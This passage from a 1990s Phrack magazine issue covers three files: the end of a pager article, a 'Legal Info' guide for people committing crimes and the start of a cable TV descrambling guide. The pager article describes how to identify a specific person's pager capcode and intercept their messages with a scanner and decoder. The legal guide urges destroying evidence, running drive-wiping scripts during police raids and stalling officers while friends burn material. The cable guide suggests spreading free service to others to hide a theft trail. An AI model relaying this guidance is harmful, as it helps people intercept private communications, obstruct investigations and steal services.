  6611. by the party being paged.  The most prolific users of this have
  6612. been the Chinese who have one of the most active paging networks
  6613. in the world.  I suppose the next biggest users of code-style numeric
  6614. paging would be drug dealers.  (2112 0830 187 -- get to the fucking
  6615. drop site by 8:30 or I'll bust a cap in your ass!)  :)
  6616.  
  6617. Alphanumeric pagers are most often contacted through a dedicated
  6618. service that will manually enter in the message to be sent onto the
  6619. paging terminal.  One such service, NDC, offers its phone-answering
  6620. and message typing services to various pager companies.  Next time
  6621. you are talking to a pager operator, ask him or her if they are at
  6622. NDC.  They probably are.
  6623.  
  6624. In addition to the capcode, pagers will have an FCC ID number, a serial
  6625. number, and most importantly, the frequency that the device has been
  6626. crystaled for imprinted on the back of the device.  Although technology
  6627. exists that would allow pagers to listen on a number of frequencies
  6628. by synthesizing the frequency rather than using a crystal, pager
  6629. manufacturers stick to using crystals to "keep the unit cost down."
  6630.  
  6631. Pagers may have multiple capcodes by which they can be addressed by.
  6632. Multiple capcodes are most often used when a person has subscribed to
  6633. various services offered by their provider, or when the subscriber is
  6634. part of a group of individuals who will all need to receive the same
  6635. page simultaneously (police, EMTs, etc.).
  6636.  
  6637. Most low-cost pagers have their capcode stored on the circuit board
  6638. in a PAL.  Most paging companies will completely exchange pagers
  6639. rather than remove and reprogram the PAL, so I don't think
  6640. it's worth it for any experimenter to attempt.  However, like most
  6641. Motorola devices, many of their paging products can be reprogrammed
  6642. with a special serial cable and software.  Reprogramming software
  6643. is usually limited to changing baud rates, and adding capcodes.
  6644.  
  6645. Additionally, some units can be reprogrammed over the air by the
  6646. service provider.  Using a POCSAG feature known as OTP (over the air
  6647. programming) the service provider can instruct the paging receiver to
  6648. add capcodes, remove capcodes, or even shut itself down in the case
  6649. of non-payment.
  6650.  
  6651. ** SERVICES **
  6652.  
  6653. With the growing popularity of alphanumeric pagers, many service providers
  6654. have decided to branch out into the information business.  The most
  6655. common of these services is delivery of news headlines.  Other services
  6656. include stock quotes, airline flight information, voice mail and
  6657. fax reception notification, and email.  Of course, all of these services
  6658. are available for a small additional monthly premium.
  6659.  
  6660. Email is probably the single coolest thing to have sent to your
  6661. alpha pager.  (Unless you subscribe to about a zillion mailing lists)
  6662. Companies like SkyTel and Radiomail give the user an email address
  6663. that automatically forwards to your paging device.
  6664. IE: PIN-NUMBER@skymail.com.  Several packages exist for forwarding
  6665. email from a UNIX system by sending stripping down the email to
  6666. pertinent info such as FROM and SUBJECT lines, and executing a script
  6667. to send the incoming mail out via a pager terminal data port.
  6668. One such program is IXOBEEPER, which can be found with an archie
  6669. query.
  6670.  
  6671. Radiomail's founder, (and rather famous ex-hacker in his own right - go
  6672. look at ancient ComputerWorld headlines), Geoff Goodfellow had devised
  6673. such a method back in the late 70's.  His program watched for incoming
  6674. email, parsed the mail headers, and redirected the FROM and SUBJECT
  6675. lines to his alphanumeric pager.  Obviously, not many people had
  6676. alphanumeric pagers at all, much less email addresses on ARPANET
  6677. back in the 70's, so Geoff's email pager idea didn't see much
  6678. wide-spread use until much later.
  6679.  
  6680. Two RFC's have been issued recently regarding paging and the Internet.
  6681. RFC 1568, the Simple Network Paging Protocol, acts similarly to SMTP.
  6682. Upon connecting to the SNPP port the user issues commands such as:
  6683.  
  6684.         PAGE followed by pager telephone number
  6685.         MESS followed by the alpha or numeric message
  6686.         SEND
  6687.       & QUIT
  6688.  
  6689. RFC 1568 has met with some opposition in the IETF, who don't consider
  6690. it worthwhile to implement a new protocol to handle paging, since it
  6691. can be handled easily using other methods.
  6692.  
  6693. The other RFC, number 1569, suggests that paging be addressed in a rather
  6694. unique manner.  Using the domain TPC.INT, which would be reserved for
  6695. services that necessitate the direct connection to The Phone Company,
  6696. individual pagers would be addressed by their individual phone numbers.
  6697. Usernames would be limited to pager-alpha or pager-numeric to represent
  6698. the type of pager being addressed.  For example, an alpha-page being sent to
  6699. 1-800-555-1212 would be sent as pager-alpha@2.1.2.1.5.5.5.0.0.8.1.tcp.int.
  6700.  
  6701. ** PAGING TERMINAL DATA PORTS **
  6702.  
  6703. Many services offer modem connections to pager terminals so that
  6704. computer users can send pages from their desks using software packages
  6705. like WinBeep, Notify! or Messenger.  All of these services connect to
  6706. the pager terminal and speak to it using a protocol known as
  6707. IXO.
  6708.  
  6709. Upon connection, a pager terminal identifies itself with the following:
  6710.  
  6711. ID=
  6712.  
  6713. (I bet you always wondered what the hell those systems were)
  6714. Paging terminals default to 300 E71, although many larger companies
  6715. now have dialups supporting up to 2400.
  6716.  
  6717. Many such systems allow you to manually enter in the appropriate information
  6718. by typing a capital "M" and a return at the ID= prompt.  The system will then
  6719. prompt you for the PIN of the party you wish to page, followed by a prompt
  6720. for the message you wish to send, followed by a final prompt asking if you
  6721. wish to send more pages.  Not every pager terminal will support a manual
  6722. entry, but most do.
  6723.  
  6724. All terminals support the IXO protocol.  As there are far too many
  6725. site specific examples within the breadth of IXO, we will concentrate on
  6726. the most common type of pager services for our examples.
  6727.  
  6728. [  Sample IXO transaction of a program sending the message ABC to PIN 123
  6729.    gleened from the IXOBeeper Docs                                         ]
  6730.  
  6731. Pager Terminal                          YOU
  6732. --------------------------------------------------------------
  6733.                                         <CR>
  6734. ID=
  6735.                                         <ESC>PG1<CR>
  6736. Processing - Please Wait
  6737.                                         <CR>
  6738. <CR>
  6739. ACK <CR>
  6740. <ESC>[p <CR>
  6741.                                         <STX>123<CR>
  6742.                                         ABC<CR>
  6743.                                         <ETX>17;<CR>
  6744. <CR>
  6745. ACK <CR>
  6746.                                         <EOT><CR>
  6747. <ESC>EOT <CR>
  6748.  
  6749.  
  6750. The checksum data came from:
  6751.  
  6752. STX     000 0010
  6753. 1       011 0001
  6754. 2       011 0010
  6755. 3       001 0011
  6756. <CR>    000 1101
  6757. A       100 0001
  6758. B       100 0010
  6759. C       100 0011
  6760. <CR>    000 1101
  6761. ETX     000 0011
  6762. ----------------
  6763.      1 0111 1011
  6764. ----------------
  6765.      1    7    ;  Get it?  Get an ASCII chart and it will all make sense.
  6766.  
  6767.  
  6768. Note:  Everything in the paging blocks, from STX to ETX inclusive are used
  6769.        to generate the checksum.  Also, this is binary data, guys...you can't
  6770.        just type at the ID= prompt and expect to have it recognized as IXO.
  6771.        It wants specific BITS.  Got it?  Just checking...
  6772.  
  6773.  
  6774. ** PAGER FREQUENCIES - US **
  6775.  
  6776. [Frequencies transmitting pager information are extremely easy to
  6777.  identify while scanning.   They identify each batch transmission
  6778.  with a two-tone signal, followed by bursts of data.  People with
  6779.  scanners may tune into some of the following frequencies to
  6780.  familiarize themselves with this distinct audio.]
  6781.  
  6782. Voice Pager Ranges:      152.01   - 152.21
  6783.                          453.025  - 453.125
  6784.                          454.025  - 454.65
  6785.                          462.75   - 462.925
  6786.  
  6787. Other Paging Ranges:      35.02   -  35.68
  6788.                           43.20   -  43.68
  6789.                          152.51   - 152.84
  6790.                          157.77   - 158.07
  6791.                          158.49   - 158.64
  6792.                          459.025  - 459.625
  6793.                          929.0125 - 931.9875
  6794.  
  6795. ** PAGER FREQUENCIES - WORLD **
  6796.  
  6797. Austria         162.050  - 162.075         T,N,A
  6798. Australia       148.100  - 166.540         T,N,A
  6799.                 411.500  - 511.500         T,N,A
  6800. Canada          929.025  - 931-975         T,N,A
  6801.                 138.025  - 173.975         T,N,A
  6802.                 406.025  - 511.975         T,N,A
  6803. China           152.000  - 172.575           N,A
  6804. Denmark                    469.750           N,A
  6805. Finland                    450.225         T,N,A
  6806.                 146.275  - 146.325         T,N,A
  6807. France          466.025  - 466.075         T,N,A
  6808. Germany         465.970  - 466.075         T,N,A
  6809.                            173.200         T,N,A
  6810. Hong Kong                  172.525           N,A
  6811.                            280.0875        T,N,A
  6812. Indonesia       151.175  - 153.050             A
  6813. Ireland         153.000  - 153.825         T,N,A
  6814. Italy                      466.075         T,N,A
  6815.                            161.175         T,N
  6816. Japan           278.1625 - 283.8875         T,N
  6817. Korea           146.320  - 173.320         T,N,A
  6818. Malaysia        152.175  - 172.525           N,A,V
  6819.                            931.9375          N,A
  6820. Netherlands     156.9865 - 164.350         T,N,A
  6821. New Zealand     157.925  - 158.050         T,N,A
  6822. Norway          148.050  - 169.850         T,N,A
  6823. Singapore                  161.450           N,A
  6824.                            931.9375          N,A
  6825. Sweden                     169.8           T,N,A
  6826. Switzerland                149.5           T,N,A
  6827. Taiwan                     166.775           N,A
  6828.                            280.9375          N,A
  6829. Thailand                   450.525           N,A
  6830.                 172.525  - 173.475           N,A
  6831. UK              138.150  - 153.275         T,N,A
  6832.                 454.675  - 466.075         T,N,A
  6833.  
  6834. T = Tone
  6835. N = Numeric
  6836. A = Alphanumeric
  6837. V = Voice
  6838.  
  6839.  
  6840. ** INTERCEPTION AND THE LAW **
  6841.  
  6842. For many years the interception of pages was not considered an
  6843. invasion of privacy because of the limited information provided
  6844. by the tone-only pagers in use at the time.  In fact, when
  6845. Congress passed the Electronic Communications Privacy Act in 1986
  6846. tone-only pagers were exempt from its provisions.
  6847.  
  6848. According to the ECPA, monitoring of all other types of paging signals,
  6849. including voice, is illegal.  But, due to this same law, paging
  6850. transmissions are considered to have a reasonable expectation to
  6851. privacy, and Law Enforcement officials must obtain a proper court
  6852. order to intercept them, or have the consent of the subscriber.
  6853.  
  6854. To intercept pages, many LE-types will obtain beepers programmed with
  6855. the same capcode as their suspect.  To do this, they must contact
  6856. the paging company and obtain the capcode associated with the person
  6857. or phone number they are interested in.  However, even enlisting
  6858. the assistance of the paging companies often requires following
  6859. proper legal procedures (warrants, subpoenas, etc.).
  6860.  
  6861. More sophisticated pager-interception devices are sold by a variety
  6862. of companies.  SWS Security sells a device called the "Beeper Buster"
  6863. for about $4000.00.  This particular device is scheduled as
  6864. a Title III device, so any possession of it by someone outside
  6865. a law enforcement agency is a federal crime.  Greyson Electronics
  6866. sells a package called PageTracker that uses an ICOM R7100
  6867. in conjunction with a personal computer to track and decode pager
  6868. messages.  (Greyson also sells a similar package to decode
  6869. AMPS cellular messages from forward and reverse channels called
  6870. "CellScope.")
  6871.  
  6872. For the average hacker-type, the most realistic and affordable option
  6873. is the Universal M-400 decoder.  This box is about 400 bucks and
  6874. will decode POCSAG at 512 and 1200, as well as GOLAY (although I've never
  6875. seen a paging service using GOLAY.)  It also decodes CTCSS, DCS, DTMF,
  6876. Baudot, ASCII, SITOR A & B, FEC-A, SWED-ARQ, ACARS, and FAX.  It
  6877. takes audio input from any scanners external speaker jack, and
  6878. is probably the best decoder available to the Hacker/HAM for the price.
  6879.  
  6880. Output from the M400 shows the capcode followed by T, N or A (tone, numeric
  6881. or alpha) ending with the message sent.  Universal suggests hooking
  6882. the input to the decoder directly to the scanner before any de-emphasis
  6883. circuitry, to obtain the true signal.  (Many scanners alter the audio
  6884. before output for several reasons that aren't really relevant to this
  6885. article...they just do. :) )
  6886.  
  6887. Obviously, even by viewing the pager data as it streams by is of little
  6888. use to anyone without knowing to whom the pager belongs to.  Law Enforcement
  6889. can get a subpoena and obtain the information easily, but anyone else
  6890. is stuck trying to social engineer the paging company.  One other alternative
  6891. works quite well when you already know the individuals pager number,
  6892. and need to obtain the capcode (for whatever reason).
  6893.  
  6894. Pager companies will buy large blocks in an exchange for their customers.
  6895. It is extremely easy to discover the paging company from the phone number
  6896. that corresponds to the target pager either through the RBOC or by paging
  6897. someone and asking them who their provider is when they return your call.
  6898. Once the company is known, the frequencies allocated to that company
  6899. are registered with the FCC and are public information.  Many CD-ROMs
  6900. are available with the entire FCC Master Frequency Database.
  6901. (Percon sells one for 99 bucks that covers the whole country -
  6902. 716-386-6015)  Libraries and the FCC itself will also have this information
  6903. available.
  6904.  
  6905. With the frequency set and a decoder running, send a page that will be
  6906. incredibly easy to discern from the tidal wave of pages spewing
  6907. forth on the frequency.  (6666666666, THIS IS YOUR TEST PAGE, etc...)
  6908. It will eventually scroll by, and presto!  How many important people
  6909. love to give you their pager number?
  6910.  
  6911. ** THE FUTURE **
  6912.  
  6913. With the advent of new technologies pagers will become even more
  6914. present in both our businesses and private lives.  Notebook computers
  6915. and PDAs with PCMCIA slots can make use of the new PCMCIA pager cards.
  6916. Some of these cards have actual screens that allow for use without the
  6917. computer, but most require a program to pull message data out.  These
  6918. cards also have somewhat large storage capacity, so the length of
  6919. messages have the option of being fairly large, should the service
  6920. provider allow them to be.
  6921.  
  6922. With the advent of 8-bit alphanumeric services, users with PCMCIA pagers
  6923. can expect to receive usable computer data such as spreadsheet
  6924. entries, word processing documents, and of course, GIFs.  (Hey, porno
  6925. entrepreneurs:  beeper-porn!  Every day, you get a new gif sent to your
  6926. pagecard!  Woo Woo.  Sad thing is, it would probably sell.)
  6927.  
  6928. A branch of Motorola known as EMBARC (Electronic Mail Broadcast to A
  6929. Roaming Computer) was one of the first to allow for such broadcasts.
  6930. EMBARC makes use of a proprietary Motorola protocol, rather than
  6931. POCSAG, so subscribers must make use of either a Motorola NewsStream
  6932. pager (with nifty serial cable) or a newer PCMCIA pager.  Messages are
  6933. sent to (and received by) the user through the use of special client
  6934. software.
  6935.  
  6936. The software dials into the EMBARC message switch accessed through
  6937. AT&T's ACCUNET packet-switched network.  The device itself is used
  6938. for authentication (most likely its capcode or serial number)
  6939. and some oddball protocol is spoken to communicate with the switch.
  6940.  
  6941. Once connected, users have the option of sending a page out, or
  6942. retrieving pages either too large for the memory of the pager, or
  6943. from a list of all messages sent in the last 24 hours, in case the
  6944. subscriber had his pager turned off.
  6945.  
  6946. Additionally, the devices can be addressed directly via x.400
  6947. addresses.  (X.400: The CCITT standard that covers email address
  6948. far too long to be worth sending anyone mail to.)  So essentially,
  6949. any EMBARC customer can be contacted from the Internet.
  6950.  
  6951. MTEL, the parent company of the huge paging service SkyTel, is
  6952. implementing what may be the next generation of paging technologies.
  6953. This service, NWN, being administrated by MTEL subsidiary Destineer,
  6954. is most often called 2-way paging, but is more accurately Narrowband-PCS.
  6955.  
  6956. The network allows for the "pager" to be a transceiver.  When a page
  6957. arrives, the device receiving the page will automatically send back
  6958. an acknowledgment of its completed reception.  Devices may also
  6959. send back some kind of "canned response" the user programs.  An example
  6960. might be:  "Thanks, I got it!" or "Why on Earth are you eating up my
  6961. allocated pages for the month with this crap?"
  6962.  
  6963. MTEL's service was awarded a Pioneers Preference by the FCC, which gave them
  6964. access to the narrowband PCS spectrum before the auctions.  This is a big
  6965. deal, and did not go unnoticed by Microsoft.  They dumped cash into the
  6966. network, and said the devices will be supported by Chicago.  (Yeah,
  6967. along with every other device on the planet, right?  Plug and Pray!)
  6968.  
  6969. The network will be layed out almost identically to MTEL's existing paging
  6970. network, using dedicated lines to connect towers in an area to a central
  6971. satellite up/downlink.  One key difference will be the addition of
  6972. highly somewhat sensitive receivers on the network, to pick up the ACKs
  6973. and replies of the customer units, which will probably broadcast at
  6974. about 2 or 3 watts.  The most exciting difference will be the
  6975. speed at which the network transmits data:  24,000 Kbps.  Twenty-four
  6976. thousand.  (I couldn't believe it either.  Not only can you get your
  6977. GIFs sent to your pager, but you get them blinding FAST!)  The actual
  6978. units themselves will most likely look like existing alphanumeric pagers
  6979. with possibly a few more buttons, and of course, PCMCIA units will
  6980. be available to integrate with computer applications.
  6981.  
  6982. Beyond these advancements, other types of services plan on offering
  6983. paging like features.  CDPD, TDMA & CDMA Digital Cellular and ESMR
  6984. all plan on providing a "pager-like" option for their customers.
  6985. The mere fact that you can walk into a K-Mart and buy a pager
  6986. off a rack would indicate to me that pagers are far to ingrained into
  6987. our society, and represent a wireless technology that doesn't scare
  6988. or confuse the yokels.  Such a technology doesn't ever really go away.
  6989.  
  6990.  
  6991. ** BIBLIOGRAPHY **
  6992.  
  6993. Kneitel, Tom, "The Secret Life of Beepers," _Popular Communications_,
  6994.          p. 8, July, 1994.
  6995.  
  6996. O'Brien, Michael, "Beep! Beep! Beep!," _Sun Expert_, p. 17, March, 1994.
  6997.  
  6998. O'Malley, Chris, "Pagers Grow Up," _Mobile Office_, p. 48, August, 1994.
  6999.                               ==Phrack Magazine==
  7000.  
  7001.                  Volume Five, Issue Forty-Six, File 9 of 28
  7002.  
  7003. ****************************************************************************
  7004.  
  7005.                            Legal Info
  7006.                         by Szechuan Death
  7007.  
  7008.      OK.  This document applies only to United States citizens: if
  7009. you are a citizen of some other fascist country, don't come whining
  7010. to me when this doesn't work..... :)
  7011.  
  7012.      Make no mistake:  I'm not a lawyer.  I've merely paid
  7013. attention and picked up some facts that might be useful to me along
  7014. the way.  There are three subjects that it pays to have a knowledge
  7015. of handy:  prescription drugs, medical procedures, and legal facts.
  7016. While these may all be boring as hell, they can certainly pull your
  7017. ass out of the fire in a pinch.
  7018.  
  7019.      Standard disclaimer:  I make no claims about this document or
  7020. facts contained therein.  I also make no claims about their legal
  7021. authenticity:  if you want to be 100% sure, there's a library in
  7022. damn near every town, LOOK IT UP!
  7023.  
  7024.      One more thing:  This document is useful for virtually
  7025. ANYTHING.  It's effectiveness stretches far beyond computer hacking
  7026. (although it's worn a bit thin for serious crimes, as every cretin
  7027. on Death Row has tried it already.....:)
  7028.  
  7029.      OK.  Let's say, just for the sake of argument, that you've
  7030. decided to take a walk along the wild side and do something
  7031. illegal.  For our purposes, let's say computer hacking (imagine
  7032. that).  There are many things you can do cover your legal ass,
  7033. should your activities come to the attention of any of our various
  7034. friendly law-enforcement agencies nationwide.
  7035.  
  7036.  
  7037. --  Part 1:  Police Mentality
  7038.  
  7039.      You must understand the police, if you ever want to be able to
  7040. thwart them and keep your freedom.  Most police, to survive in
  7041. their jobs, have developed an "Us vs. Them" attitude, which we
  7042. should tolerate (up to a point).  They use this attitude to justify
  7043. their fascist tactics.  "Us" is the police, a brotherhood that
  7044. keeps the peace, always does right, and never snitches on each
  7045. other, no matter what the cause.  "Them" is the rest of the
  7046. population.  If "They" are not guilty of a specific crime, they
  7047. must have done something else, and they're doing their damndest to
  7048. avoid getting caught.  In addition, many police have cultivated an
  7049. attitude similar to that of a 15-year-old high school punk:  "I'm
  7050. bad, I'm bad, I'm SOOOOO bad, I Am Cop, Hear Me ROAR," etc.
  7051. Unfortunately, these people have weapons and the authority to
  7052. support that attitude.  Therefore, if the police come to your
  7053. house, be EXTREMELY polite and subservient; now is not the time to
  7054. start spouting your opinion about the police state in America
  7055. today.  Also, DO NOT RESIST THEM IF THEY ARREST YOU.  Besides
  7056. adding a charge of "Resisting Arrest" and/or "Assaulting an
  7057. Officer", it can get very dangerous.  The police have been trained
  7058. in a number of suspect-control techniques, most of which involve
  7059. twisting body parts at unnatural angles.  As if this weren't
  7060. enough, almost all police carry guns.  Start fighting and you'll
  7061. get a couple broken bones, torn ligaments, or worse, a few bullet
  7062. wounds (possibly fatal).  So remember, be very meek.  Show them
  7063. that you are cowed by their force and their blustering presence,
  7064. and this will save you a black eye or two on the way down to the
  7065. station (from tripping and falling, of course).
  7066.  
  7067. --  Part 2:  Hacker's Security
  7068.  
  7069.      CARDINAL RULE #1:  Get rid of the evidence.  No evidence = no
  7070. case for the prosecutor.  The Novice Hacker's Guide from LOD has an
  7071. excellent way to put this:
  7072.  
  7073. VIII. Don't be afraid to be paranoid.  Remember, you *are* breaking the law.
  7074.       It doesn't hurt to store everything encrypted on your hard disk, or
  7075.       keep your notes buried in the backyard or in the trunk of your car.  You
  7076.       may feel a little funny, but you'll feel a lot funnier when you when you
  7077.       meet Bruno, your transvestite cellmate who axed his family to death.
  7078.  
  7079. Basic hints:
  7080. Hide all your essential printouts, or burn them if they're trash
  7081. (remember:  police need no warrant to search your trash).  Encrypt
  7082. the files on your hard drive with something nasty, like PGP or RSA.
  7083. Use a file-wiper, NOT delete, to get rid of them when you're done.
  7084. And WIPE, don't FORMAT, your floppies and other magnetic media
  7085. (better still, degauss them).  With a little common sense and a bit
  7086. of effort, a great deal of legal headaches can be avoided.
  7087.  
  7088.  
  7089. --  Part 3A:  Polite Entry
  7090.  
  7091.      Next part.  You and your friends are enjoying an evening of
  7092. trying to polevault the firewall on whitehouse.com, when suddenly
  7093. you hear a knock at the door.  Opening the door, you find a member
  7094. of the local police force standing outside, asking if he can come
  7095. in and ask you some questions.  Now, here's where you start to piss
  7096. your pants.  If you were smart, you'll have arranged something
  7097. beforehand where your friends (or, if there ARE no friends present,
  7098. an automatic script) are getting rid of the evidence as shown in
  7099. part 2.  If you have no handy means of destroying the data
  7100. (printouts, floppies, tapes, etc.), throw the whole mess into
  7101. the bathtub, soak it in lighter fluid, and torch it.  It's a
  7102. helluva mess to clean up, but nothing compared to latrine duty at
  7103. your nearest federal prison.
  7104.  
  7105.      While the evidence is being destroyed, you're stalling the
  7106. police.  Ask to see their search warrant and IDs.  Mull over each
  7107. and every one of them for at least 5 minutes.  If they have none,
  7108. start screaming about your 4th Amendment rights.  Most importantly:
  7109. DON'T INVITE THEM IN.  They're like vampires:  if you let them in,
  7110. you're fucked.  If they see anything even REMOTELY incriminating,
  7111. that constitutes probable cause for a search and they'll be
  7112. swarming all over your house like flies on shit.  (And guess what!
  7113. It's legal, because YOU LET THEM IN!)  Now, be aware that this
  7114. won't stall them forever:  they can simply wait outside the house
  7115. and radio in a request for a search warrant, which will probably be
  7116. signed by the judge on duty at that time.  Remember:  "If you're
  7117. not willing to be searched, you MUST have something to hide!"  If
  7118. there are no friends assisting you, as shown above, USE THIS TIME
  7119. EFFECTIVELY.  When they get the warrant signed, that will be too
  7120. late, because you'll have erased/shredded/burned/hidden/etc. all
  7121. the incriminating evidence.
  7122.  
  7123.  
  7124. --  Part 3B:  And Suddenly, The Door Burst In
  7125.  
  7126.      Now, if the police already have a search warrant, they don't
  7127. need to knock on the door.  They can simply kick the door down and
  7128. waltz in.  If you're there at the time, you CAN try and stall them
  7129. as shown above, by asking to see their search warrant and IDs.
  7130. This may not work now, because they have you cold, hard, and dead
  7131. to rights.  And, if anything incriminating is in a place where they
  7132. can find it, you're fucked, because it WILL be used as evidence.
  7133. But this won't happen to you, because you've already put everything
  7134. you're not using right at the moment in a safe, HIDDEN, place.
  7135. Right?
  7136.  
  7137.      This leaves the computer.  If you hear them kicking the door
  7138. in, keep calm, and run a script you've set up beforehand to low-
  7139. level-format the drive, wipe all hacking files, encrypt the whole
  7140. thing, etc.  If there's any printouts or media hanging out, try and
  7141. hide them (probably worthless anyway, but worth a try).  The name
  7142. of the game now is to minimize the damage that can be done to you.
  7143. The less hard evidence linking you to the "crime", the less of a
  7144. case the prosecutor will have and the better off you'll be.
  7145.  
  7146.  
  7147. --  Part 4:  The Arrest
  7148.  
  7149.      Now is the time to kick all your senses into hyper-record
  7150. mode.  For you to get processed through the system without a hitch,
  7151. the arrest has to go perfectly, by the numbers.  One small slip and
  7152. you're out through a loophole.  Now, the police are aware of this
  7153. and will be doing their best to see that doesn't happen, but you
  7154. may get lucky all the same.  First of all:  According to the
  7155. Miranda Act, the police are REQUIRED BY LAW to read you your rights
  7156. and make sure you understand them.  Remember EVERY WORD THEY SAY TO
  7157. YOU.  If they don't say it correctly, you may be able to get off on
  7158. a technicality.
  7159.  
  7160.      CARDINAL RULE #2:  You have the right to remain silent.
  7161. EXERCISE IT.  This cannot be stressed enough.  If you need a
  7162. reminder, listen to the first part of the Miranda Warning:
  7163.  
  7164.      "You have the right to remain silent.  If you give up that
  7165. right, ANYTHING YOU SAY CAN AND WILL BE USED AGAINST YOU IN A COURT
  7166. OF LAW."
  7167.  
  7168.      Nice ring to it, hmm?  The only words coming out of your mouth
  7169. at this point should be "I'd like to speak to my attorney, please"
  7170. and, if applicable in your area, "I'd like to make a phone call,
  7171. please"  (remember the "please's," see part #1 above)  Nothing
  7172. else.  There are tape recorders, video cameras, PLUS the word of a
  7173. dozen police officers to back it all up.  How's that for an array
  7174. of damning evidence against you?
  7175.  
  7176.      Then, after the ride downtown, you'll be booked and probably
  7177. asked a few questions.  Say nothing.  You're probably pissing your
  7178. pants with fear at this point, and may be tempted to roll over on
  7179. everyone you ever shook hands with in your whole life, but keep
  7180. your calm, and KEEP QUIET.  Keep asking for your attorney and/or a
  7181. phone call, no matter WHAT threats/deals/etc. they make to you.
  7182. Remember, they can't legally interrogate you without your attorney
  7183. present.  You may also be tempted to show your mettle at this
  7184. point, and give them false information, but remember one thing:  If
  7185. you lie to them, you can be convicted of perjury (a nasty offense
  7186. itself).  The best policy here is NSA:  Never Say Anything.
  7187. Remember, you never have to keep track of what you've said, or have
  7188. to worry about having it used against you, if you've said NOTHING.
  7189.  
  7190.  
  7191. --  Part 5:  The Trial
  7192.  
  7193.      Here, we'll assume you've been arrested, booked, let out on
  7194. bail, indicted on X counts of so-and-so, etc.  You're now in the
  7195. system.  CARDINAL RULE #3:  Get the best criminal defense attorney
  7196. you can afford, preferably one with some background in the crime
  7197. you've committed.  No, scratch that:  make that the best criminal
  7198. defense attorney, PERIOD.  It's a helluva lot better to spend 5
  7199. years working at McDonald's 12 hours a day to pay back your legal
  7200. fee, than it is to spend 5 years in the slammer getting pimped out
  7201. nightly for a pack of menthols.  Also, pay attention during the
  7202. trial.  Remember, the defense attorney is working for YOU:  it's
  7203. YOUR life they're deciding, so give him every bit of information
  7204. and help you can.  You're paying him to sort it out for you, but
  7205. you should still keep an eye on things:  if, in the middle of a
  7206. trial, something happens (you get a killer idea, or want to jump up
  7207. and scream "BULLSHIT!"), TELL HIM!  It very well might be useful!
  7208. Also, have him nitpick every single thing for loopholes,
  7209. technicalities, civil rights violations, etc.  It's worth it if it
  7210. pays off.
  7211.  
  7212.      Another important thing is to look good.  Image is everything.
  7213. Although you might prefer to wear heavily stained rock-band T-
  7214. shirts, leather jackets, ratty jeans, etc. in real life, that will
  7215. be EXTREMELY damning in the eyes of the judge/jury.  They say that
  7216. clothes make the man, and in this case it's REALLY true:  get a
  7217. suit, comb/cut your hair, shave, etc.  Make yourself look like a
  7218. "positively respectable darling" in the eyes of the court!  It'll
  7219. pay off for you. (hey, it worked for Eric and Lyle Menendez)
  7220.  
  7221.  
  7222. --  Part 8:  The Prison
  7223.  
  7224.      If you're here, you're totally fucked.  Unless, by divine
  7225. intervention, your conviction is overturned on appeal, you'd better
  7226. clear up the next 5 years on your calendar.  Apparently, you didn't
  7227. read closely enough, so read this every day during your long stay
  7228. in prison, and you'll be better equipped next time (assuming there
  7229. IS a next time..... :)
  7230.  
  7231.  
  7232.      Remember the cardinal rules:  1)  Don't leave evidence around
  7233. to be found.  2)  KEEP CALM AND KEEP QUIET.  3)  Get the best
  7234. attorney available.  If you remember these, and exercise some common
  7235. sense and a lot of caution, you should have no problem handling any
  7236. legal problems that come up.
  7237.  
  7238.      Note:  This is intended to be used as a handbook for defense
  7239. from minor crimes ONLY (hacking, DWI, etc.)  If you're a career
  7240. criminal, or you've murdered or raped somebody, you're scum, and at
  7241. least have the grace to plead "guilty".  Don't waste the tax-
  7242. payers' time and money with fancy legal footwork.
  7243.  
  7244.      Please feel free to add anything or correct this document.
  7245. However, if you DO add or correct something, PLEASE make sure it's
  7246. true, and PLEASE email me the changes so I can include them in the next
  7247. revision of the document.  My address is pstlb@acad3.alaska.edu.  Happy
  7248. hacking to all, and if this helps you avoid getting caught, so much the
  7249. better.  :)
  7250.                               ==Phrack Magazine==
  7251.  
  7252.                  Volume Five, Issue Forty-Six, File 10 of 28
  7253.  
  7254. ****************************************************************************
  7255.  
  7256.                    /**************************/
  7257.                    /* A Guide to Porno Boxes */
  7258.                    /*     by Carl Corey      */
  7259.                    /**************************/
  7260.  
  7261.  
  7262. Keeping with tradition, and seeing that this is the first article in
  7263. Phrack on cable TV descrambling, any illegal box for use in descrambling
  7264. cable television signals is now known as a PORNO BOX.
  7265.  
  7266. There are many methods that cable companies use to insure that you get
  7267. what you pay for - and _only_ what you pay for.  Of course, there are
  7268. always methods to get 'more than you pay for'.  This file will discuss
  7269. the most important aspects of these methods, with pointers to more
  7270. detailed information, including schematics and resellers of equipment.
  7271.  
  7272.  
  7273. Part I.  How the cable company keeps you from getting signals
  7274.    A brief history
  7275.  
  7276. ---Older Systems---
  7277.  
  7278. Most scrambling methods are, in theory, simple.  The original method
  7279. used to block out signals was the trap method.  All traps remove signals
  7280. that are sent from the CATV head end (the CATV company's station).  The
  7281. first method, which is rarely used anymore was the negative trap.
  7282. Basically, every point where the line was dropped had these traps, which
  7283. removed the pay stations from your signal.  If you decided to add a pay
  7284. station, the company would come out and remove the trap.  This method was
  7285. pretty secure - you would provide physical evidence of tampering if you
  7286. climbed the pole to remove them or alter them (sticking a pin through
  7287. them seemed to work randomly, but could affect other channels, as it
  7288. shifts the frequency the trap removes.)  This was a very secure system,
  7289. but did not allow for PPV or other services, and required a lot of
  7290. physical labor (pole-climbers aren't cheap).  The only places this is
  7291. used anymore is in an old apartment building, as one trip can service
  7292. several programming changes.  Look for a big gray box in the basement
  7293. with a lot of coax going out.  If you are going to give yourself free
  7294. service, give some random others free service to hide the trail.
  7295.  
  7296. The next method used was termed a positive trap.  With this method, the
  7297. cable company sends a _very_ strong signal above the real signal.  A
  7298. tuner sees the strong signal, and locks onto the 'garbage' signal.  A
  7299. loud beeping and static lines would show up on the set.  For the CATV
  7300. company to enable a station, they put a 'positive' trap on the line,
  7301. which (despite the name) removes the garbage signal.  Many text files
  7302. have been around on how to descramble this method (overlooking the
  7303. obvious, buying a (cheap) notch filter), ranging from making a crude
  7304. variable trap, to adding wires to the cable signal randomly to remove the
  7305. signal.  This system is hardly used anymore, as you could just put a trap
  7306. inside your house, which wouldn't be noticed outside the house.
  7307.  
  7308. ---Current Systems---
  7309.  
  7310. The next advent in technology was the box.  The discussion of different
  7311. boxes follows, but there is one rather new technology which should be
  7312. discussed with the traps.  The addressable trap is the CATV's dream.  It
  7313. combines the best features of the negative trap (very difficult to tamper
  7314. with without leaving evidence) with features of addressable boxes (no
  7315. lineman needs to go out to add a service, computers can process Pay Per
  7316. View or other services).  Basically, a 'smart trap' sits on the pole and
